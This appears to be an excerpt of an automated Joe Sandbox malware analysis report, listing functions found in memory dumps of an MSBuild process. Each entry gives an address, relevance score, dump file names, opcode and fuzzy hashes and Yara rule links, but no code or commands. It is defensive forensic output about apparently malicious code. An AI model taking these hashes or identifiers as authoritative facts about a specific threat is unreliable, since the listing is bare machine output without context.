                                                      • Opcode ID: 1021b8a5264ce7be7097febedd30c696bc45fcd7cc0f8270f8b13da5db679e8d
                                                      • Instruction ID: 659d7e25e8347d8cd9812487df68eb1e7a0dd7f53a6c97c1a400e82e8edbc80b
                                                      • Opcode Fuzzy Hash: 1021b8a5264ce7be7097febedd30c696bc45fcd7cc0f8270f8b13da5db679e8d
                                                      • Instruction Fuzzy Hash: 20516A34B041158FDB08EB68C469AAD7BF6EF89704F204569E406EB3E5CB75AD01CBA1
                                                      Function 00C07D98 Relevance: 1.4, Strings: 1, Instructions: 100COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345806135.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_c00000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LR]q
                                                      • API String ID: 0-3081347316
                                                      • Opcode ID: bb852281235d3b0ad773e4ca1d59d9cef2238332ee8a55fb9f08c5f45e355590
                                                      • Instruction ID: 3ee64e68c1256a159852f113c31b6526c9ee9dacb4c9c6e69bed2f4c534c5bd2
                                                      • Opcode Fuzzy Hash: bb852281235d3b0ad773e4ca1d59d9cef2238332ee8a55fb9f08c5f45e355590
                                                      • Instruction Fuzzy Hash: 21316F30E152099FEB18CFA9C59579EB7B2EF99300F208565E816EB290DB70AD42CB51
                                                      Function 00C07DA8 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345806135.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_c00000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LR]q
                                                      • API String ID: 0-3081347316
                                                      • Opcode ID: ca2b740c510dcd208c91befc632beed35bbe387450402aa11b9e181a630cc863
                                                      • Instruction ID: f59f3c1a7d7c52cb3fe6d9843c79408f80e7f40a1f615843446342655fa6b382
                                                      • Opcode Fuzzy Hash: ca2b740c510dcd208c91befc632beed35bbe387450402aa11b9e181a630cc863
                                                      • Instruction Fuzzy Hash: F9316130E15209DFDF18CFA5C54469EB7B2EF89300F108665E816E7280EB70AD42CB51
                                                      Function 00C06BB0 Relevance: 1.3, Strings: 1, Instructions: 79COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345806135.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_c00000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LR]q
                                                      • API String ID: 0-3081347316
                                                      • Opcode ID: 3e117ebfde2fe73cae75657edfea440265a9a892d28cc15439c0243ee17e194d
                                                      • Instruction ID: d33e751dd13ee73e8cc8a18f13dce3392f1711e7dcc1411f3636b61194520d91
                                                      • Opcode Fuzzy Hash: 3e117ebfde2fe73cae75657edfea440265a9a892d28cc15439c0243ee17e194d
                                                      • Instruction Fuzzy Hash: 53213A727042415FDB06AB7CD0511997BB5EF97304B004896D045CB2AAEA398C1BC7A1
                                                      Function 00C08739 Relevance: .6, Instructions: 556COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345806135.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_c00000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0a951e104055338c5255ff50d27979588b12eac321c90e5cfe3cff7e427f0f4a
                                                      • Instruction ID: 74f0212ee8e38af9a238e53d354a7a192060d71c7e5cd3381b439fb685609225
                                                      • Opcode Fuzzy Hash: 0a951e104055338c5255ff50d27979588b12eac321c90e5cfe3cff7e427f0f4a
                                                      • Instruction Fuzzy Hash: 4E12B2707002098FDF15AB38E6A562C77B6FB89350B508979E406CB399CF35DD8AC794
                                                      Function 00C08748 Relevance: .6, Instructions: 550COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345806135.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_c00000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: be37ed2e5113720286169051e873a1c82c1255b0c5d8d3ffcd07aa91b09fd0f4
                                                      • Instruction ID: a82edda3949409eaa5d3927a628b192f75e65c12c266cd6e4c120080b37ff6f2
                                                      • Opcode Fuzzy Hash: be37ed2e5113720286169051e873a1c82c1255b0c5d8d3ffcd07aa91b09fd0f4
                                                      • Instruction Fuzzy Hash: 031292707002098BDF19AB38E6A562C77B6FBC9350B508979E406DB398CF35DD8AC794
                                                      Function 00C04A97 Relevance: .3, Instructions: 260COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345806135.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_c00000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ac9b18b8444e44ad0935d986768e7a4484b8b3f9a54ca4e08b4c232a76b3c459
                                                      • Instruction ID: 14144fa33b978273ce0a5e1d64c6b1d11017bf160f92a0ee22cde56091a1e381
                                                      • Opcode Fuzzy Hash: ac9b18b8444e44ad0935d986768e7a4484b8b3f9a54ca4e08b4c232a76b3c459
                                                      • Instruction Fuzzy Hash: 7FA17DB0E00209DFDF14CFA9D9857DEBBF2BF48314F248129D925A7294EB749981CB81
                                                      Function 00C0A1C2 Relevance: .3, Instructions: 251COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345806135.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_c00000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ac39f9699d57df1a236732110af28ce53f7aa016e0ee17dfaa4f41560782c6c6
                                                      • Instruction ID: d7a39d74ae77753fe8aa664741d1ecee60c446ac83b535ac48fe8ca2aa37362a
                                                      • Opcode Fuzzy Hash: ac39f9699d57df1a236732110af28ce53f7aa016e0ee17dfaa4f41560782c6c6
                                                      • Instruction Fuzzy Hash: 8BA14D34A102049FDB14DFA8D594AADBBF2EF88310F148565E816EB3A8DB35ED42CB45
                                                      Function 00C03E7F Relevance: .2, Instructions: 234COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345806135.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_c00000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 38d25011d3303affbf442480445b0df3d9c9beced5dba2665caa801985f66aef
                                                      • Instruction ID: 56e37acf58d5b88a480d71e1e9b195bb18e0b6e19028ef3f08efbd5a72504e93
                                                      • Opcode Fuzzy Hash: 38d25011d3303affbf442480445b0df3d9c9beced5dba2665caa801985f66aef
                                                      • Instruction Fuzzy Hash: FB9180B0E00249DFDF14CFA9C9857DEBBF2AF98304F248129E515A7294DB749986CF81
                                                      Function 00C0A6D8 Relevance: .2, Instructions: 216COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345806135.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_c00000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2f0601f49d34961e175a6820dc5aa5cda24a201e3319b4208b5ec230f7a4aa43
                                                      • Instruction ID: 4cbe8c119cc7f476b50c7e7b514627df286a292a8fd51edf70559e7058e4f4e3
                                                      • Opcode Fuzzy Hash: 2f0601f49d34961e175a6820dc5aa5cda24a201e3319b4208b5ec230f7a4aa43
                                                      • Instruction Fuzzy Hash: DB717D71A002058FDB04DF69D984B9DBBF6FF88310F24C269E918AB395DB70D945CB91
                                                      Function 00C0480C Relevance: .2, Instructions: 180COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345806135.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_c00000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4536e468a90e4d71e8f0d352e291bf1b09752fb9264b419fb50cb54c374005ea
                                                      • Instruction ID: 9e2d11907cdb8962dd4331a5f4b1fd3421292014c9f8d75638cdc6cbf0ad596c
                                                      • Opcode Fuzzy Hash: 4536e468a90e4d71e8f0d352e291bf1b09752fb9264b419fb50cb54c374005ea
                                                      • Instruction Fuzzy Hash: 1E719CB0E00249CFDF14DFA9C8817DEBBF2AF88304F148129E519A7294DB749942CF91
                                                      Function 00C04818 Relevance: .2, Instructions: 180COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345806135.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_c00000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c593874f78cf8530c26ddde78ef4fbae5a1f3fdd01000ad7658925476abc3196
                                                      • Instruction ID: 14cff40364477212ff16f1929cd6fa7b2504cd33f69df2f9338d865e6e8f764b
                                                      • Opcode Fuzzy Hash: c593874f78cf8530c26ddde78ef4fbae5a1f3fdd01000ad7658925476abc3196
                                                      • Instruction Fuzzy Hash: AE718DB0E00209CFDF14DFA9C88179EBBF6BF88314F148129E515A7294DB749942DF95
                                                      Function 00C0A510 Relevance: .1, Instructions: 144COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345806135.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_c00000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0c2f8a106510f3e1e032d3e91e36f6682c954f89de8eb22a3fe6a9cc2b455ac6
                                                      • Instruction ID: c8f7d7c86f825afa6e499f5d9b97b7f8a3fd53783210f9e227e11d544214bbb5
                                                      • Opcode Fuzzy Hash: 0c2f8a106510f3e1e032d3e91e36f6682c954f89de8eb22a3fe6a9cc2b455ac6
                                                      • Instruction Fuzzy Hash: A1419030B006068FDF249A68D99076E77B5FB85314F20492AE419DB2C5D736DE85CB83
                                                      Function 00C06CF3 Relevance: .1, Instructions: 134COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345806135.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_c00000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5d3e5d0f50335f95b225c6787eb15078637227bfd90326f505e39fb83b24f82e
                                                      • Instruction ID: 9da2a06808fadb371898e25145f9c753083abdd45212aaebab3c4beb9f3ed9a0
                                                      • Opcode Fuzzy Hash: 5d3e5d0f50335f95b225c6787eb15078637227bfd90326f505e39fb83b24f82e
                                                      • Instruction Fuzzy Hash: A65103B4E003188FDB14CFA9C885B9DBBB1BF49314F148129E829BB391D774A945CF95
                                                      Function 00C06CF8 Relevance: .1, Instructions: 132COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345806135.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_c00000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4b3f5738fe81e913dc3afee087005ec64f5a565f777d898bcfcaadb7ee0c4184
                                                      • Instruction ID: d86ab3e0ee7c667b29d9e79f04034f7185fde522b504816efa1f443f2c5bd954
                                                      • Opcode Fuzzy Hash: 4b3f5738fe81e913dc3afee087005ec64f5a565f777d898bcfcaadb7ee0c4184
                                                      • Instruction Fuzzy Hash: 5E511374E003188FDB14CFA9C885B9EBBB1BF49314F148529E829BB391D774A944CF95
                                                      Function 00C01123 Relevance: .1, Instructions: 118COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345806135.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_c00000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3e0b81639435022440535c12a7bd5fa1ee5d8941077f2478937aac9814584dd8
                                                      • Instruction ID: d495b186bc2965f1ebd963bfb2cdf5a0b352ba302329c6f9aba0bca61782ccfd
                                                      • Opcode Fuzzy Hash: 3e0b81639435022440535c12a7bd5fa1ee5d8941077f2478937aac9814584dd8
                                                      • Instruction Fuzzy Hash: 8A513B30612281CFCB0AFF28FDA09553F75FBD6384314AA69D0456B23EDB70690ADB90
                                                      Function 00C0A503 Relevance: .1, Instructions: 118COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345806135.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_c00000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 995abe23be16fdc3ec6f67f231e903480f9e43f046ed48c0bb5dc6edee17ccec
                                                      • Instruction ID: e399de1d460359180a814e9d321e7b607fdf9a6f7b85c42eeef6a99ad8db2587
                                                      • Opcode Fuzzy Hash: 995abe23be16fdc3ec6f67f231e903480f9e43f046ed48c0bb5dc6edee17ccec
                                                      • Instruction Fuzzy Hash: C141A270B007068BDF24DA68C98176E77B5FB85304F24492AE41ADB2D5D736DE85CB83
                                                      Function 00C01138 Relevance: .1, Instructions: 112COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345806135.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_c00000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2f2a0bf741448c2cc6ddb944ddffbf69faa03594836f6f4f74872831721cbb8c
                                                      • Instruction ID: 61509e4b7f9b11d4f0a4b1a71e5e190da3d2a282c5996462890e6c0047b61207
                                                      • Opcode Fuzzy Hash: 2f2a0bf741448c2cc6ddb944ddffbf69faa03594836f6f4f74872831721cbb8c
                                                      • Instruction Fuzzy Hash: E9510970612141CFCB0AFF28FDA09593F69FBD6384314AA29D0456B23EDB70690ADF90
                                                      Function 00C026E4 Relevance: .1, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345806135.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_c00000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: eee991da872fa821a1dfc66588145c51a0b0a5dc6a30e9491bbfc956ab870b0b
                                                      • Instruction ID: 06d69271c1b0beed37bf4e098550ec7420bc64d7915ceddd5ac3bba0f1331bec
                                                      • Opcode Fuzzy Hash: eee991da872fa821a1dfc66588145c51a0b0a5dc6a30e9491bbfc956ab870b0b
                                                      • Instruction Fuzzy Hash: 9E41EDB5D002499FDB14DFA9C484ADEBFB5BF48310F24802AE419AB294DB75A945CF90
                                                      Function 00C026F0 Relevance: .1, Instructions: 90COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345806135.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_c00000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 90d31d552b527ff630d4e1e646860643359ba205eb1cfb1c8acef9c94330b170
                                                      • Instruction ID: ac46b7daaecf9806d87803b9cd4e64cf6fe864caaeee5e978899b3dcf717796e
                                                      • Opcode Fuzzy Hash: 90d31d552b527ff630d4e1e646860643359ba205eb1cfb1c8acef9c94330b170
                                                      • Instruction Fuzzy Hash: 99410EB4D002489FDB10DFA9C484ADEBFB5FF48300F208029E819AB290DB75A945CB90
                                                      Function 00C01383 Relevance: .1, Instructions: 86COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345806135.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_c00000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cb4b7d7496a2273fda35b2b17545ad55fe2df53280c69fe590541dfd910d7139
                                                      • Instruction ID: a2320387ef06ed8abea3f988f140c5f633b4c22339ebfa33470214b9b5389e28
                                                      • Opcode Fuzzy Hash: cb4b7d7496a2273fda35b2b17545ad55fe2df53280c69fe590541dfd910d7139
                                                      • Instruction Fuzzy Hash: 733126706002018FEF25AB68F59471D7769EB52304F140829E806CB3F9D739DE4ACB51
                                                      Function 00C0A080 Relevance: .1, Instructions: 83COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345806135.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_c00000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7b5080fc80288cf9bb34c230a4da61aed937a639eb9d919a4a2ff75875beef37
                                                      • Instruction ID: 01d06ae9c4d50b9449e85dbb7400a212489443e2bf06ecf178973ce4ff8d6f1d
                                                      • Opcode Fuzzy Hash: 7b5080fc80288cf9bb34c230a4da61aed937a639eb9d919a4a2ff75875beef37
                                                      • Instruction Fuzzy Hash: 23318F31E00209DFDB05CF65D99569EF7B2AF89300F10C62AE815EB394DB709D46CB52
                                                      Function 00C016A8 Relevance: .1, Instructions: 83COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345806135.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_c00000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 671c4c7583759e6b9b7843936ae69c4a165d0b8388b45923525b7c8d1d0986a7
                                                      • Instruction ID: 12d4dbef0bff7aeb6ecd2d409a9e72da5906309549e57a1820fccbda307a070c
                                                      • Opcode Fuzzy Hash: 671c4c7583759e6b9b7843936ae69c4a165d0b8388b45923525b7c8d1d0986a7
                                                      • Instruction Fuzzy Hash: 9821F774A001014FDB22AF2CF8A4B597759EB54344F245A25E416CB2FEDB28DE4ACB52
                                                      Function 00C017C8 Relevance: .1, Instructions: 83COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345806135.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_c00000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8e2f3e6594013c9505f2672a4b0ee86e51e57b80490657d2fb62c263780cf53b
                                                      • Instruction ID: af951690bb687f96cf5fdf06cbbc8f68524a927a9f792d0ba4c0f208e9526e6e
                                                      • Opcode Fuzzy Hash: 8e2f3e6594013c9505f2672a4b0ee86e51e57b80490657d2fb62c263780cf53b
                                                      • Instruction Fuzzy Hash: 13213A75F002115FDB116B7CA84435F7BA9EB89350F244425EC19C7385EB29CE43C781
                                                      Function 00C01493 Relevance: .1, Instructions: 81COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345806135.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_c00000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 274a72f0360ce2a011f241beef7a943e7ba26152538aa734717ab52f3107b13f
                                                      • Instruction ID: b6d0af6391980b59ba84977e836b3f868025f21de5f512d98ff4f768eaf561bc
                                                      • Opcode Fuzzy Hash: 274a72f0360ce2a011f241beef7a943e7ba26152538aa734717ab52f3107b13f
                                                      • Instruction Fuzzy Hash: 6821C271A012118FDF25EFB894813ADB7A0EB49310F290479ED16EB2E1E735DE42CB52
                                                      Function 00C0A090 Relevance: .1, Instructions: 78COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345806135.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_c00000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1ceddd09cc7a8e0b4b67be80423477af0434b2fd8bf866704a995d6a04b1e5ae
                                                      • Instruction ID: 0f3ea268340aab6198067731a85242416d680855ffc334bc5a6a1ca7b06b7ecf
                                                      • Opcode Fuzzy Hash: 1ceddd09cc7a8e0b4b67be80423477af0434b2fd8bf866704a995d6a04b1e5ae
                                                      • Instruction Fuzzy Hash: 6D216031E00209DBDB05DF65D99069EF7B6EF89300F10C629E815BB394DB719D46CB91
                                                      Function 00C09F80 Relevance: .1, Instructions: 75COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345806135.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_c00000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a6852dc20c3bffd6f5048eab0bf35c114b871037840cc1b7d1139265234f224c
                                                      • Instruction ID: f08483899be0993546b09577f3556db47feb7088647ca71f2a7e45d948d0d9d4
                                                      • Opcode Fuzzy Hash: a6852dc20c3bffd6f5048eab0bf35c114b871037840cc1b7d1139265234f224c
                                                      • Instruction Fuzzy Hash: 1A21A431E0020A9BCB08CFA4C4416DEF7B2FF89314F20862AE816F7390DB749946CB51
                                                      Function 00BBD030 Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345601481.0000000000BBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BBD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_bbd000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 859f3d9acc2684e2caad951383833f591e1a71c74752173538f236c57ae03a42
                                                      • Instruction ID: 2a492675711cb7bd6b7efaf22ec2592e88a13af15b6b98b5c7e69509ee9fc44b
                                                      • Opcode Fuzzy Hash: 859f3d9acc2684e2caad951383833f591e1a71c74752173538f236c57ae03a42
                                                      • Instruction Fuzzy Hash: 9F212271604204DFCB14EF14D9D0F26BBA5FB84314F60C6ADD8094B296D3BED806CB62
                                                      Function 00C04F90 Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345806135.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_c00000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 799b7c072f5153390282cd7dac5d1225d557777a67aa1b3a2fb48069f8c45ffb
                                                      • Instruction ID: af8624ba349a5b9cc28064d8203f90f1f4c327825aa35000f531564460adf776
                                                      • Opcode Fuzzy Hash: 799b7c072f5153390282cd7dac5d1225d557777a67aa1b3a2fb48069f8c45ffb
                                                      • Instruction Fuzzy Hash: BB212A74A00209CFDB04EB78D968AAE7BF1AF8D304B104468E506EB3A5DF329D01CB91
                                                      Function 00C01880 Relevance: .1, Instructions: 71COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345806135.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_c00000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6d2230218b879cc891cfafd463300af486d344c37f5975f70d9b97153401ee19
                                                      • Instruction ID: 3ba9cce0efed77d74fd231b872fecbda4ab7377c192cae74036bfbdf02bcb102
                                                      • Opcode Fuzzy Hash: 6d2230218b879cc891cfafd463300af486d344c37f5975f70d9b97153401ee19
                                                      • Instruction Fuzzy Hash: F7215C30B00205CFEB14EB78C6697ADB7F6AB89345F140468D906EB3E4DB368E41CB51
                                                      Function 00C01890 Relevance: .1, Instructions: 70COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345806135.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_c00000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dd313a4b8a4179f8605bf961f27952c5a73fd02b71ba00158d4b5e000b68bfe3
                                                      • Instruction ID: f65cc42a5c340afb11ddfb5c22f97f1e0751dcfb96f0c5224af056123b880176
                                                      • Opcode Fuzzy Hash: dd313a4b8a4179f8605bf961f27952c5a73fd02b71ba00158d4b5e000b68bfe3
                                                      • Instruction Fuzzy Hash: 2D210C30B00205CFDB14EB68C5657AEB7F6AF89345F140568D906EB3E4DB369E41CB92
                                                      Function 00C09F90 Relevance: .1, Instructions: 70COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345806135.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_c00000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 35f75490c2c0eef5f0717f663fa1f966a9a60ebfcc0af868c1663665a38d3347
                                                      • Instruction ID: 0210f97b8188d058f13e081f22e0bd254e19047b9ed91c1ac965d530c39f3595
                                                      • Opcode Fuzzy Hash: 35f75490c2c0eef5f0717f663fa1f966a9a60ebfcc0af868c1663665a38d3347
                                                      • Instruction Fuzzy Hash: D9215331E0021A9BCB18CFA5C45069EF7B2BF89314F10862AE816F7390DB75AD45CB51
                                                      Function 00BBD006 Relevance: .1, Instructions: 69COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345601481.0000000000BBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BBD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_bbd000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f06ebc08cc9a3df6e37733a918e4596796b788f801ff1e85dfc67d31d66d353b
